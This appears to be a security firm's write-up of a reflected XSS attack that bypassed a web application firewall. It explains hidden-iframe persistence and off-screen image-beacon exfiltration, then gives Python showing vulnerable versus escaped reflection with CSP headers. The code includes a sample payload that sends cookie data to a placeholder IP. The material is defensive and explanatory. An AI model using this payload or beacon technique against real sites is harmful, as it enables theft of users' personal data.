Firesand has identified a sophisticated hack that would have bypassed a client’s Web Application Firewall and caused serious damage.
In this case, the hacker sent a phishing email referencing a real promotion that the business was running. Within this email, a WAF bypass technique was used to deliver malicious code in a link, which the victim clicks.
In this attack, the website was tricked into delivering malicious content to the user via a Reflected XSS (Cross-Site Scripting) vulnerability. The vulnerable page takes external input, does not validate it and reflects it back to the user. As a result, the malicious code at the end of the link is read by the website’s servers and then delivered back to the user’s browser.
At this stage, the victim’s browser receives the malicious code and executes it. The malicious script creates an iframe and embeds the target website in it. The iframe has an ‘onload’ event handler, meaning the script runs every time a link is followed and a page is loaded. This handler is configured to reload the attack onto every page, and it is set up so the user cannot see this.
Under this method, extra code can seamlessly be added and from this, a copy of the data is sent from the victim’s browser to the target website. This data could include personal information such as banking details.
To obtain this data, an SOP bypass is conducted that tricks the browser into sending it. An image tag is embedded into the web page with a style that positions the image off the viewable area of the screen. The image’s src attribute is set to the IP address of the receiving web server, and a query string carrying the captured data is appended to the end of that URL.
When the browser attempts to download the new image from that URL, a blank ‘image not found’ icon is loaded onto the page. As this is positioned off screen, the user doesn’t see it. The web server receives all the data and the hacker can see it too.
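As an added illustration (not Firesand’s code or the client’s), the following Python shows the reflection defect described above beside a hardened version that encodes the parameter before reflecting it and sets a Content-Security-Policy restricting where scripts and images may load from. The URL, the ‘promo’ parameter name and the 192.0.2.1 address are constructed for the example.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed sample: a promotion link whose "promo" parameter carries markup
# instead of a promotion code. 192.0.2.1 is an RFC 5737 documentation address.
PAYLOAD = '<img src="http://192.0.2.1/?d=cookie">'
SAMPLE_URL = "https://shop.example/promo?promo=" + quote(PAYLOAD, safe="")

TEMPLATE = "<p>Your promotion code is: {value}</p>"


def reflected_value(url: str) -> str:
    """Extracts the 'promo' query parameter exactly as a server framework would."""
    params = parse_qs(urlsplit(url).query)
    return params.get("promo", [""])[0]


def render_vulnerable(url: str) -> str:
    """Reflects the parameter verbatim, so the browser parses any markup it holds."""
    return TEMPLATE.format(value=reflected_value(url))


def render_hardened(url: str) -> str:
    """Encodes the parameter for an HTML body context before reflecting it."""
    return TEMPLATE.format(value=html.escape(reflected_value(url), quote=True))


def security_headers() -> dict:
    """Defence in depth: block inline scripts and image loads to other origins,
    so an injected image beacon to an external address is refused by the browser."""
    return {
        "Content-Security-Policy": (
            "default-src 'self'; script-src 'self'; img-src 'self'; "
            "frame-ancestors 'self'"
        ),
        "X-Content-Type-Options": "nosniff",
    }


def is_safely_reflected(render, url: str) -> bool:
    """Regression check: True if no raw '<' from the input survives rendering."""
    value = reflected_value(url)
    return "<" not in value or "<" + value[1:] not in render(url)
```

The check function can be dropped into a test suite to catch any template that starts reflecting untrusted input without encoding.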
Finding this high-risk vulnerability highlights the importance of ensuring that websites and systems are regularly monitored for any potential threats. Any small update can cause problems so it is essential to regularly check for security threats.